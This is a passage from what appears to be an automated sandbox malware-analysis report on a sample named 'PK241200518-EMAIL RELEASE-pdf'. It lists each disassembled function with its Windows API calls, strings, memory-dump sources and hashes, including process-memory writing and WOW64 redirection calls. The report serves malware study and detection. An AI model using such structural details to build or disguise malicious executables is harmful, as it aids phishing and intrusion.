                                                                                                          • Instruction Fuzzy Hash: C4918F71108601DFCB14EF24D899CAEB7A8EF85710F14491DF8469B2A2EB78ED49CB52
                                                                                                          Function 007BB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007BB9BB
                                                                                                          • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BB9D4
                                                                                                          • CoUninitialize.OLE32 ref: 007BB9F1
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 2126378814-24824748
                                                                                                          • Opcode ID: 10dd4355236629a07a439c4ad01be4a1adcd3f835efbdfeed06002f9c21a1689
                                                                                                          • Instruction ID: 97da367cccbc6bd936251c93d46dbf78a10f5cc34ba2ffa697b10d76928bd94b
                                                                                                          • Opcode Fuzzy Hash: 10dd4355236629a07a439c4ad01be4a1adcd3f835efbdfeed06002f9c21a1689
                                                                                                          • Instruction Fuzzy Hash: 2FA13475604205DFC704DF14C884E9ABBE5FF89324F148998F8999B3A2CB79EC49CB91
                                                                                                          Function 007AB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 007AB4BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContainedObject
                                                                                                          • String ID: AutoIt3GUI$Container$%~
                                                                                                          • API String ID: 3565006973-1172083821
                                                                                                          • Opcode ID: 05e656a254a56ebf73f63c0beae984dac9da80ca1476534207a1aca68c8956dd
                                                                                                          • Instruction ID: 70846d1f473aff1a8aca2f28f917b769b088f3e13b10df90578497988fb87205
                                                                                                          • Opcode Fuzzy Hash: 05e656a254a56ebf73f63c0beae984dac9da80ca1476534207a1aca68c8956dd
                                                                                                          • Instruction Fuzzy Hash: 39916A70600601EFDB54DF64C884B6AB7E9FF8A710F24866DF94ACB292DB75E841CB50
                                                                                                          Function 0077501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 007750AD
                                                                                                            • Part of subcall function 007800F0: __87except.LIBCMT ref: 0078012B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorHandling__87except__start
                                                                                                          • String ID: pow
                                                                                                          • API String ID: 2905807303-2276729525
                                                                                                          • Opcode ID: 3311c3a67ab32c48d2443aa26cb6fd7f9e61d51b296d5a0aba26795f2eb62de6
                                                                                                          • Instruction ID: a8a57241fdc43b3d30aec891210cb49e6d8d9806fade7584efe2cedef994c139
                                                                                                          • Opcode Fuzzy Hash: 3311c3a67ab32c48d2443aa26cb6fd7f9e61d51b296d5a0aba26795f2eb62de6
                                                                                                          • Instruction Fuzzy Hash: DB517A20E4860586DF517738C84937E2B98AB01790F30CD58E4D98A2A9EFBC89D8D7C6
                                                                                                          Function 00798584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: 3cv$_v
                                                                                                          • API String ID: 4104443479-436345795
                                                                                                          • Opcode ID: 799ca8de52e4810b47bd6843e25872e920e491a710f750e9132af61fe31766db
                                                                                                          • Instruction ID: f7e7e65b215b5cf2830afca0e9188c037480f0487739463634e11989822159d6
                                                                                                          • Opcode Fuzzy Hash: 799ca8de52e4810b47bd6843e25872e920e491a710f750e9132af61fe31766db
                                                                                                          • Instruction Fuzzy Hash: 3A515C70A00609DFCF64CF68D884AAEBBF1FF45304F248529E85AD7250EB39E965CB51
                                                                                                          Function 007B9734 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754F0B: __fread_nolock.LIBCMT ref: 00754F29
                                                                                                          • _wcscmp.LIBCMT ref: 007B9824
                                                                                                          • _wcscmp.LIBCMT ref: 007B9837
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscmp$__fread_nolock
                                                                                                          • String ID: FILE$
                                                                                                          • API String ID: 4029003684-3276627178
                                                                                                          • Opcode ID: d057d10b162de9cf4a5b48dee0e6a804a96c2782cc8140f576c2524e0347e5cb
                                                                                                          • Instruction ID: 89775a842663e47641bdae385227a86e7e8377173056c2ed2c6ca305e3879256
                                                                                                          • Opcode Fuzzy Hash: d057d10b162de9cf4a5b48dee0e6a804a96c2782cc8140f576c2524e0347e5cb
                                                                                                          • Instruction Fuzzy Hash: 8D41C531A00209FADF209BA4CC4DFEFBBB9DF85714F004069FA15E7181DA79A9448B61
                                                                                                          Function 007A97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007A9296,?,?,00000034,00000800,?,00000034), ref: 007B14E6
                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007A983F
                                                                                                            • Part of subcall function 007B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007B14B1
                                                                                                            • Part of subcall function 007B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 007B1409
                                                                                                            • Part of subcall function 007B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007A925A,00000034,?,?,00001004,00000000,00000000), ref: 007B1419
                                                                                                            • Part of subcall function 007B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007A925A,00000034,?,?,00001004,00000000,00000000), ref: 007B142F
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007A98AC
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007A98F9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                          • Opcode ID: cf82d23fe1b2bcf3963358c238533f6598983d26e91a8a90216c6756c89e2ccc
                                                                                                          • Instruction ID: b959d7b0a87861b903c6c0cf8a2ed5620859825c6be7b398b430a9df101957ea
                                                                                                          • Opcode Fuzzy Hash: cf82d23fe1b2bcf3963358c238533f6598983d26e91a8a90216c6756c89e2ccc
                                                                                                          • Instruction Fuzzy Hash: C9415C7690121CBFCB10DFA4CC95BDEBBB8EB4A300F404199FA45B7181DA746E45CBA0
                                                                                                          Function 007D7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007DF910,00000000,?,?,?,?), ref: 007D79DF
                                                                                                          • GetWindowLongW.USER32 ref: 007D79FC
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007D7A0C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long
                                                                                                          • String ID: SysTreeView32
                                                                                                          • API String ID: 847901565-1698111956
                                                                                                          • Opcode ID: 7beec37974affe147c87d1051c0462dbf27b6aadac1b34cb548cbd592956bde0
                                                                                                          • Instruction ID: 79b2159fd0774ee2c72dbaba93ac2ee8b8b8216898f820e4fd29e6555669b847
                                                                                                          • Opcode Fuzzy Hash: 7beec37974affe147c87d1051c0462dbf27b6aadac1b34cb548cbd592956bde0
                                                                                                          • Instruction Fuzzy Hash: 3131CE32204606ABDB158E38CC45BEA77B9EB45324F248726F875922E0E739E951CB50
                                                                                                          Function 007D73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007D7461
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007D7475
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D7499
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: SysMonthCal32
                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                          • Opcode ID: 5d4467e6b38bb9e98c3cfdb6ec771a9bd64625e48a61da024ba5f4f8182a6dcb
                                                                                                          • Instruction ID: c5bed9acdb051a1c41631bdbc611d10720021a46cd441dee4ef9ef94c7868d60
                                                                                                          • Opcode Fuzzy Hash: 5d4467e6b38bb9e98c3cfdb6ec771a9bd64625e48a61da024ba5f4f8182a6dcb
                                                                                                          • Instruction Fuzzy Hash: 1521B132500258ABDF168E94CC46FEA3B79EF48724F110115FE556B2D0DAB9AC50CBA0
                                                                                                          Function 007D7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007D7C4A
                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007D7C58
                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007D7C5F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                          • Opcode ID: 3373a9bf2e0b03ab81c35de9f4ef75f2addd2b2430354fcba1431d1efb300cf5
                                                                                                          • Instruction ID: f7aac1555895d5d95fb5844a2738a74f2137a37422967332aade7a81e1fb64f7
                                                                                                          • Opcode Fuzzy Hash: 3373a9bf2e0b03ab81c35de9f4ef75f2addd2b2430354fcba1431d1efb300cf5
                                                                                                          • Instruction Fuzzy Hash: 9F216BB1204208AFDB15DF28DCC5DA737BCEF4A3A4B54405AFA059B3A1DB75EC11CA60
                                                                                                          Function 007D6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007D6D3B
                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007D6D4B
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007D6D70
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                          • String ID: Listbox
                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                          • Opcode ID: a8308693b342243776547af6c577912fa35c598eb9895170090eee42dc1d2855
                                                                                                          • Instruction ID: aa1ecb8cfa756d8f82276aaf82b594b62a1a5c1d7d2f6c3d8183296bb8331afe
                                                                                                          • Opcode Fuzzy Hash: a8308693b342243776547af6c577912fa35c598eb9895170090eee42dc1d2855
                                                                                                          • Instruction Fuzzy Hash: 4F21B032711118BFDF118F54DC45EAB3BBAEF89760F018125F9459B2A0C675AC518BA0
                                                                                                          Function 007C39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __snwprintf.LIBCMT ref: 007C3A66
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __snwprintf_memmove
                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d$%~
                                                                                                          • API String ID: 3506404897-1730846867
                                                                                                          • Opcode ID: 7d8c627e119488b0c3d0a468e63672e646ff86f64cf6f85a0d5ce2d34f3fefdc
                                                                                                          • Instruction ID: 9e647406853df8b564efae913e93d1f9c0d8be275e0e4df7d4a967fc73d1e3c5
                                                                                                          • Opcode Fuzzy Hash: 7d8c627e119488b0c3d0a468e63672e646ff86f64cf6f85a0d5ce2d34f3fefdc
                                                                                                          • Instruction Fuzzy Hash: 33217C31600219EACF14EF64CC86EAE77B9AF44300F008459F955AB282DA78AA55CBA1
                                                                                                          Function 007D770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007D7772
                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007D7787
                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007D7794
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: msctls_trackbar32
                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                          • Opcode ID: 88cbf0faf7aaffd819631653ae6e90e84ed088b5b80f61cec5fff65b3142c1e9
                                                                                                          • Instruction ID: 21a41d6de7ff64be6bef9283b516532713a3c16663edf0299a498cdda1f87957
                                                                                                          • Opcode Fuzzy Hash: 88cbf0faf7aaffd819631653ae6e90e84ed088b5b80f61cec5fff65b3142c1e9
                                                                                                          • Instruction Fuzzy Hash: FA11E372244208BEEF245F65CC05FEB77B9EF88B64F114529FA45A61E0D676E811CB20
                                                                                                          Function 00791935 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00791775
                                                                                                            • Part of subcall function 007CBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0079195E,?), ref: 007CBFFE
                                                                                                            • Part of subcall function 007CBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007CC010
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0079196D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                          • String ID: Pm$WIN_XPe
                                                                                                          • API String ID: 582185067-3764392556
                                                                                                          • Opcode ID: 2e9e16f3c8c2ab3e582e6bb62c5866ef47325d6ddb4ecb69c034967f4f7d0add
                                                                                                          • Instruction ID: e98b310804e7d52096a68da5e4e344e10771714d1ca8bdfef7445efffbfb90be
                                                                                                          • Opcode Fuzzy Hash: 2e9e16f3c8c2ab3e582e6bb62c5866ef47325d6ddb4ecb69c034967f4f7d0add
                                                                                                          • Instruction Fuzzy Hash: 33F0C97080110ADFDF15DB91D988BECBBF8BB08301F94409AE102A2190D7799F94DF64
                                                                                                          Function 00754C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00754B83,?), ref: 00754C44
                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00754C56
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                          • API String ID: 2574300362-1355242751
                                                                                                          • Opcode ID: 6ee794d2a0f375b60bf30cef2978acfeddb16c7f4af249b49b88d4d4c90aadac
                                                                                                          • Instruction ID: 86df473c0216d21799f313c8e7a0f1755d431bf7435254bb140a5dea5c5a45fe
                                                                                                          • Opcode Fuzzy Hash: 6ee794d2a0f375b60bf30cef2978acfeddb16c7f4af249b49b88d4d4c90aadac
                                                                                                          • Instruction Fuzzy Hash: 06D0C770502B13CFC7208F31CD0829A73E5AF00346B10C83BD8A2C62A8E7B8C8C0CA20
                                                                                                          Function 00754C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00754BD0,?,00754DEF,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754C11
                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00754C23
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
